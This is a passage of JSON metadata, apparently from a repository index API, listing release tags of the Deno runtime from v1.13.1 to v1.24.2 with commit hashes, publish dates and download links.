":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/den